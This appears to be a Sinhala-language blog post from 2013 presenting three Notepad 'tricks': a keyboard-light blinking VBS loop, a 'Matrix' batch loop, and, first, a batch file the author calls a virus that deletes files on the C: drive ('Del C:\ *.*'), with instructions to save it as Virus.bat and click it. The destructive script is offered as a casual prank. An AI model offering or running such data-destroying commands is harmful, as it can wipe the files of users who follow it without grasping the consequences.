Like us

Follow Us

Total Pageviews

සුභ නව වසරක් වේවා!

හොදම Note Pad Tricks 3 !!!

by Unknown  |  in ෆන් වැඩ at  Friday, November 29, 2013

                            කොහොමද යාලුවනේ.....?      අදත් ගෙනවා post එක්ක ..............
මේක ඉතින් 99 වෙනි පෝස්ටුව නේ...... ඒ නිසා  එල කිරි වගේ දෙන්න එපායෑ.......     
                                    මේක නම් ටිකක් වෙනස් එකක් හොදේ...............................


      මේවා ඇවිල්ල Majic triks තමා .... ඔක්කම කරන්නේ Note Pad එකෙන්..
                          හොදම Note Pad  Trick 3.. කොහොමද බලන්නකෝ.......

1.  C  එක Format කරන්න Virus එක්ක හදමු.......
                සැ:යු: Format කරන්න ඕනේ නම් ව්තරක් මේක අත්හදා බැලුවට කමක්නෑ හොදේ.......
     මේක ගැන කීවොත් මේක ඇවිල්ල පොඩි Programming එකක් ..... මේක හදන්න simple උනාට...
                                                                     බයානකයි හොදේ......................
                                               කතා ඇති වැඩේට බහිමුකො......
                          ඉස්සෙල්ලම Note Pad එක open කරලා මේ cods ටික
    Copy කරගෙන Peste එකක් දාගන්නකෝ........ Note Pad එකට හොදේ....

                                                  @Echo off
                                                  Del C:\ *.* |y


දැන් ඕක save කරන්ට..........save කරනකොට....File Name එකට Virus.bat කියල දෙන්න...
වෙන ඒවා එහෙම දෙන්න එපා හරිය..........................
    දැන් ඔය Desktop එකේ තියෙන Icon එක Click කරන්න..  දැන් හරි ....

2.  Key Board එකේ Light ටික නටවමු...
          Note Pad එක open කරලා  cods ටික copy කරගන්නකො.. Note Pad එකට Paste එකකුත් දාගන්නකො......

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

 

note Pad එක save කරනකොට File Name එකට dance.vbs කියල Type කරලා  save කරන්න....
දැන් ඔයා save කරපු තැනට ආපු Icon එක Click කරල බලන්න....
ලස්සනද?,,,,,,,,,,,,,,,,,,,,, ලස්සනද කියල ඇහැව්වේ Keyboard එක .....

3.  Matrix එකේ Effect එක බලමුද?
      Note Pad එක open කරලා Note Pad එක open කරලා  cods ටික copy කරගන්නකො.. Note Pad          එකට Paste එකකුත් දාගන්න......

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


දැන් Save කරනකොට Name එක දෙන්නකෝ මෙහෙම Matrix.bat.....හරිද?
             දැන් ආපු Icon එක Click කරන්නකෝ..... කොහොමද?..................
පොඩිදෙයක් කියන්න බැරි උනානේ.... ඕක open වෙන්නේ CMD එකෙන් හොදේ......

එල නම් Comment එකක් දාලම යන්නකෝ........... හරිය...... එහෙනම් මන් යනවා හොදේ...

 Fb එකෙන් මාව මුණගැහෙන්න..{Raveen Minod Nirmal}
            

4 comments:

+++වැඩේ හොදයි කියලා හිතෙනවනම් ශේප් එකේ අදහසකුත් කොටලම යන්නකෝ..

Related Posts Plugin for WordPress, Blogger...
Proudly Powered by Blogger.